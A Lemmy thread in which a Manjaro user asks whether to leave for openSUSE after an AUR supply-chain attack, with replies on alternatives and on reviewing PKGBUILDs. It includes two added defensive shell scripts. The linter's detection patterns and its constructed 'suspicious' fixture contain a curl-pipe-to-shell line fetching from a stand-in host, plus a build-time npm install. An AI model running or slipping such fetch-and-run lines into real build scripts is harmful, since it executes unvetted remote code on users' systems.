submitted 6 hours ago by PumpkinDrama@reddthat.com to c/linux@lemmy.ml

With the recent AUR supply-chain attack that compromised over 400 (and possibly up to 1,500) packages, I'm seriously considering switching distros. Attackers took over orphaned packages and modified PKGBUILDs to pull in malicious npm dependencies like atomic-lockfile, which deployed credential-stealing malware and even eBPF rootkits. The fact that the trusted packages themselves didn't look malicious makes this especially concerning.

Like many Arch users, I'll admit I don't carefully read every PKGBUILD before installing from the AUR. The official recommendation has always been to review them manually, but realistically, who does that for every package? This incident made me realize I've been relying on trust rather than vigilance.

I've been on Manjaro for years specifically because of the AUR's vastness, but this attack directly undermines that selling point for me. I ran the Distrochooser to see what else is out there, and it strongly recommended openSUSE as my top match: https://distrochooser.de/en/d5b4e0067841/

For those who've made the jump from Arch/Manjaro to openSUSE Tumbleweed (or Leap): How was the transition? How does the OBS compare to the AUR in terms of package availability for niche software?

top 17 comments
[-] fozid@feddit.uk 1 points 28 minutes ago

You can mitigate the aur issue and retain everything else offered by not using aur. You will have the most arch like system compared to all other distros, without the risk of aur. Those packages in aur are mostly not included in other distros, so you won't lose anything.

Personally, I left arch nearly a year ago due to it being too popular, making it a target for malicious activity, it only offered bloated and overweight systemd, and after running arch for nearly 20 years, I just got bored and wanted something new, so I moved to Void Linux. Very happy with my choice. Boot time is 3 seconds, shutdown is 5 seconds. runit is a nice light and simple init system. It's rolling release but not bleeding edge, so updates never break anything.

[-] Tenderizer78@lemmy.ml 2 points 1 hour ago

I tried openSUSE, none of the software I wanted to install worked. It's just too unpopular.

Fedora with RPM Fusion is probably a better bet.

[-] voytrekk@sopuli.xyz 7 points 3 hours ago

Just drop the AUR and swap those packages to flatpak/appimage.

[-] chgxvjh@hexbear.net 1 points 1 hour ago

It's fine. Personally I don't like RPM much, but maybe it's better outside of RHELL

[-] KianaTabion@lemmy.today 1 points 2 hours ago* (last edited 1 hour ago)

https://distrochooser.de/en/d5b4e0067841/

Your results suggest that Fedora is an equally viable alternative.

Regardless, ask yourself the following question: Do you need the vastness that a repository like the AUR provides?

  • Like, are you sure that the repositories of Fedora and openSUSE Tumbleweed don't contain the packages that you need?
  • Or..., is it more about liberation? Whatever the future might throw at you, you're confident that the AUR will provide you. But..., that raises another question: are you even exotic in your software needs to begin with?

The above (sub)question(s) will (hopefully) help you to make an informed decision. Furthermore, please feel free to discuss them openly in hopes that others might chime in.

Anyhow, I foresee either one of the following:

  • You actually acknowledge (or come to the revelation) that the repositories of Fedora and/or openSUSE (without going into user repositories^[To be clear, the user repositories of Fedora and openSUSE don't fare much better than the AUR. The only solace might be that Arch's own repository is relatively small compared to theirs and thus there's less need to search for user repositories. Hence, making it easier to manage what's installed from user repositories.]) are sufficient for you. Thus, becoming a viable destination.
  • The previous option does not happen, simply because your software needs are not contained within their respective repositories. In that case, I'd seriously consider adopting nix (as a package manager on whatever distro you go for) or perhaps even NixOS if you want to go all-in. The excellent nixpkgs repository is the only one that puts the AUR to shame. And -more importantly within our current discussion- it's not a user repository, but instead the official one. And thus comes with all the security bells and whistles you'd expect.

[-] artyom@piefed.social 13 points 5 hours ago

You could just not use AUR?

[-] Twongo@lemmy.ml 4 points 4 hours ago

i'm sorry but the 'compromised aur package' controversy may be bad BUT the compromised packages were malware anyway. you just need to check what you install on your system. these malware packages are stuff like "adnauseam-firefox-git" (why on earth would you download a firefox plugin via the aur) or had names like "python-cool-32-git"

the biggest security issue were the users themselves who didn't check the packages

[-] gnunikky@lemmy.blahaj.zone 28 points 6 hours ago

I don't think jumping distro will solve your problem, any distro where you will without thinking install unofficial repo packages will have the same problem as AUR, switching to random people's scripts in OBS, COPR and so on isn't a solution imho.

[-] D_Air1@lemmy.ml 11 points 6 hours ago

Agreed, I feel like people are lacking a bit of self reflection in regards to this issue. The reason why people use the AUR is because it gives access to software outside of the official repos. No distro packages every piece of software out there. Therefore there is always a need for third party repos and that is why every distro has its own AUR equivalent. Thus leading to the same problem. Blindly installing software will never be a safe thing to do.

[-] gabmus@retrolemmy.com 5 points 6 hours ago* (last edited 6 hours ago)

also, if anything installing stuff from the AUR makes things slightly safer because PKGBUILDs and .install files are a lot easier to inspect: you can check the source repo/tarball/whatever points to an official source, and you can verify that the scripts (which are just shell scripts) are not doing anything nefarious.

on the other hand, IIRC OBS and COPR just distribute binaries that are very hard to inspect

EDIT: just don't use an AUR helper and you avoid most of the trouble

[-] MyNameIsRichard@lemmy.ml 9 points 5 hours ago

Tumbleweed is an excellent distro, but if you randomly install from people's home repositories, you could be in the same position as with the AUR.

[-] dreamy@quokk.au 13 points 6 hours ago

You should switch off from Manjaro because of their track record, not because of the AUR attack.

> The official recommendation has always been to review them manually, but realistically, who does that for every package?

How many AUR packages do you install? It doesn't take that long to review a PKGBUILD once, and then review only the changes every update.
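As an added example (not code from the thread, nor from any distro's tooling), here is a small POSIX sh script that does what dreamy describes: it keeps a copy of each PKGBUILD and .install file you have already read and, on the next update, shows only the diff against that copy. The `AUR_REVIEW_DIR` variable and the function names are assumptions; the sample checkout it writes is a constructed PKGBUILD, not a real AUR package.

```shell
#!/bin/sh
# Added example: remember which PKGBUILD/.install files you have already read,
# and on the next update print only what changed since that review.
# Assumes an AUR-style checkout: a directory holding PKGBUILD and optional
# *.install files. AUR_REVIEW_DIR is an assumed name for the store location.
set -e

review_store() {
    # $1: package name; prints the directory holding its reviewed copies
    echo "${AUR_REVIEW_DIR:-$HOME/.local/share/aur-review}/$1"
}

reviewable_files() {
    # $1: checkout directory; lists the files that run code at build/install time
    for f in "$1"/PKGBUILD "$1"/*.install; do
        if [ -f "$f" ]; then basename "$f"; fi
    done
    return 0
}

pkgbuild_review_status() {
    # $1: checkout directory, $2: package name (defaults to the directory name)
    # Prints "new", "unchanged" or "changed" on stdout; diffs go to stderr.
    pkgdir=$1; store=$(review_store "${2:-$(basename "$1")}")
    if [ ! -d "$store" ]; then echo new; return 0; fi
    status=unchanged
    for f in $(reviewable_files "$pkgdir"); do
        if [ ! -f "$store/$f" ]; then
            status=changed; echo "added file: $f" >&2
        elif ! cmp -s "$store/$f" "$pkgdir/$f"; then
            status=changed; diff -u "$store/$f" "$pkgdir/$f" >&2 || true
        fi
    done
    for f in $(reviewable_files "$store"); do
        if [ ! -f "$pkgdir/$f" ]; then status=changed; echo "removed file: $f" >&2; fi
    done
    echo "$status"
}

pkgbuild_mark_reviewed() {
    # Store the current files as the reviewed baseline. Call this only after
    # you have actually read the diff that pkgbuild_review_status printed.
    pkgdir=$1; store=$(review_store "${2:-$(basename "$1")}")
    rm -rf "$store"; mkdir -p "$store"
    for f in $(reviewable_files "$pkgdir"); do cp "$pkgdir/$f" "$store/$f"; done
}

make_sample_checkout() {
    # Writes a constructed PKGBUILD (not a real AUR package) into directory $1
    mkdir -p "$1"
    cat > "$1/PKGBUILD" <<'EOF'
pkgname=sample-tool
pkgver=1.0.0
pkgrel=1
arch=('x86_64')
source=("https://github.com/example-org/sample-tool/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')
package() { install -Dm755 sample-tool "$pkgdir/usr/bin/sample-tool"; }
EOF
}

bump_sample_checkout() {
    # Simulates an update that quietly adds a build-time dependency to $1/PKGBUILD
    printf "makedepends=('npm')\n" >> "$1/PKGBUILD"
}

# Stand-alone walk-through: sh review.sh demo
if [ "${1:-}" = demo ]; then
    work=$(mktemp -d); make_sample_checkout "$work/sample-tool"
    echo "first sight: $(pkgbuild_review_status "$work/sample-tool")"
    pkgbuild_mark_reviewed "$work/sample-tool"
    bump_sample_checkout "$work/sample-tool"
    echo "after update: $(pkgbuild_review_status "$work/sample-tool")"
    rm -rf "$work"
fi
```

The status word goes to stdout and the diff to stderr, so the script can be wrapped by whatever you use to fetch AUR checkouts: refuse to build when the status is anything but `unchanged`, read the diff, then mark the package reviewed by hand.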

[-] anon5621@lemmy.ml 1 points 4 hours ago

This is not a smart way if honestly arch repos have the biggest quantity of software compared to most popular distros, the problem here is in aur itself, just don't use aur? Or u have to validate each pkgbuild with each script going on there

[-] dieTasse@feddit.org 2 points 5 hours ago

Go Fedora, you won't regret. It's currently the most solid distro out there.

[-] AcornTickler@sh.itjust.works 1 points 5 hours ago

That's not what a supply chain attack is. No part of Arch Linux or derivatives depend on AUR and you don't have to use it.

The attack simply highlights oversights in adoption of orphaned packages and those need to be addressed for sure.

I have always tried to keep my AUR packages to a minimum (a few packages at most), and always read their PKGBUILDs and updates to them. Today, I don't use any AUR package as all the ones I need are now packaged in official repos.

[-] Arcanoloth@lemmy.ml 2 points 6 hours ago

I personally go with QubesOS which uses VMs to compartmentalize. It doesn't reduce the risk of a supply chain attack itself (fedora & debian by default), but if your VMs only contain the bare minimum for a given task the risk of having a compromised package installed is lower than in a full-featured system and any compromise is also contained to that VM.

[-] Sxan@piefed.zip -2 points 4 hours ago

It's been said a couple of times, but to recap:

  1. it was only AUR which has been compromised, not Arch
  2. what you like about AUR is how much software is available þrough it
  3. you lose AUR and þe cornucopia by switching distros
  4. you can achieve þe same result, wiþout changing distros, by simply not using AUR

On þe last point, you can preserve your distribution and retain access to þe cornucopia by changing your habits and paying attention to þe AUR prompts, and read þe PKGBUILD diffs. Reject anyþing which looks suspicious or which you don't understand. Install software you still want by hand, as you would have before Arch.

All of þese attacks have been npm/nodejs based. Don't let AUR install npm or nodejs. If you want npm software, install it manually, being aware you're just re-opening yourself to attacks þrough npm, which has also had supply chain attacks. However, if management of AUR doesn't change, sooner or later þere will be an attack which doesn't use npm as a vector, so þis is only a temporary protection.
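Added example, not code from the thread or from any AUR helper: a POSIX sh linter for the checks Sxan and gabmus describe, and for the pattern the OP mentions (a PKGBUILD that pulls npm dependencies at build time). It lists npm/nodejs entries in the dependency arrays, npm/yarn fetches or curl-pipe-to-shell inside the build functions, base64 decoding or `eval`, and source URLs that do not sit under the upstream host you expect. All function names are assumptions, and the two PKGBUILDs it writes are constructed fixtures, not real AUR packages.

```shell
#!/bin/sh
# Added example: flag the patterns in a PKGBUILD that deserve a closer read
# before makepkg runs it. Function names are assumed; samples are constructed.
set -e

pkgbuild_array() {
    # $1: array name (depends, makedepends, source, ...), $2: PKGBUILD path
    # Prints one element per line; handles arrays that span several lines.
    awk -v name="$1" -v q="'" '
        $0 ~ ("^" name "=\\(") { inarr = 1; sub("^" name "=\\(", "") }
        inarr {
            line = $0
            if (index(line, ")")) { inarr = 0; sub(/\).*/, "", line) }
            n = split(line, parts, /[ \t]+/)
            for (i = 1; i <= n; i++) {
                gsub("^[\"" q "]|[\"" q "]$", "", parts[i])
                if (parts[i] != "") print parts[i]
            }
        }' "$2"
}

pkgbuild_lint() {
    # $1: PKGBUILD path, $2: expected upstream host/path prefix (optional)
    # Prints one finding per line; prints nothing for a clean file.
    f=$1; upstream=${2:-}
    for arr in depends makedepends checkdepends; do
        pkgbuild_array "$arr" "$f" | grep -E '^(npm|nodejs|node)([<>=].*)?$' \
            | sed "s/^/dependency: $arr lists /" || true
    done
    # Package-manager fetches inside build()/package() download code at build time
    grep -nE '(^|[^[:alnum:]_-])(npm|npx|yarn|pnpm)[[:space:]]+(install|ci|add)' "$f" \
        | sed 's/^/build-time package fetch: line /' || true
    grep -nE '(curl|wget)[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|$)' "$f" \
        | sed 's/^/pipe-to-shell: line /' || true
    grep -nE 'base64[[:space:]]+(-d|--decode)|(^|[^[:alnum:]_])eval[[:space:]]' "$f" \
        | sed 's/^/obfuscation or eval: line /' || true
    if [ -n "$upstream" ]; then
        # Strip the "localname::" prefix, keep only remote URLs, drop the expected host
        pkgbuild_array source "$f" | sed 's/^.*:://' | grep -E '^[a-z+]+://' \
            | grep -v -- "$upstream" | sed 's/^/source outside upstream: /' || true
    fi
    return 0
}

pkgbuild_finding_count() {
    # Same arguments as pkgbuild_lint; prints the number of findings
    pkgbuild_lint "$@" | grep -c . || true
}

make_sample_pkgbuilds() {
    # Writes $1/clean/PKGBUILD and $1/suspicious/PKGBUILD (constructed fixtures)
    mkdir -p "$1/clean" "$1/suspicious"
    cat > "$1/clean/PKGBUILD" <<'EOF'
pkgname=hello-tool
pkgver=1.2.0
pkgrel=1
pkgdesc="Constructed sample, not a real AUR package"
arch=('x86_64')
url="https://github.com/example-org/hello-tool"
license=('MIT')
depends=('glibc')
makedepends=('cmake'
             'git')
source=("$pkgname-$pkgver.tar.gz::https://github.com/example-org/hello-tool/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')
build() { cmake -B build; cmake --build build; }
package() { DESTDIR="$pkgdir" cmake --install build; }
EOF
    cat > "$1/suspicious/PKGBUILD" <<'EOF'
pkgname=hello-tool-git
pkgver=1.2.0.r5.gabcdef0
pkgrel=1
pkgdesc="Constructed sample showing the patterns worth flagging"
arch=('x86_64')
url="https://github.com/example-org/hello-tool"
license=('MIT')
depends=('glibc' 'nodejs')
makedepends=('git' 'npm')
source=("git+https://github.com/example-org/hello-tool.git"
        "helper.tar.gz::https://files.example.net/helper.tar.gz")
sha256sums=('SKIP' 'SKIP')
build() {
  cd "$srcdir/hello-tool"
  npm install --no-audit
  curl -s https://files.example.net/setup.sh | sh
}
package() { install -Dm755 dist/hello-tool "$pkgdir/usr/bin/hello-tool"; }
EOF
}

# Stand-alone walk-through over the constructed fixtures: sh lint.sh demo
if [ "${1:-}" = demo ]; then
    d=$(mktemp -d); make_sample_pkgbuilds "$d"
    for p in clean suspicious; do
        echo "== $p: $(pkgbuild_finding_count "$d/$p/PKGBUILD" github.com/example-org) finding(s)"
        pkgbuild_lint "$d/$p/PKGBUILD" github.com/example-org
    done
    rm -rf "$d"
fi
```

A finding is a prompt to read that line, not a verdict: plenty of legitimate PKGBUILDs list nodejs or fetch from a second host. The point of the upstream argument is the one gabmus makes, that the source array is the place to confirm the package really builds from the project's own repository.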

this post was submitted on 16 Jun 2026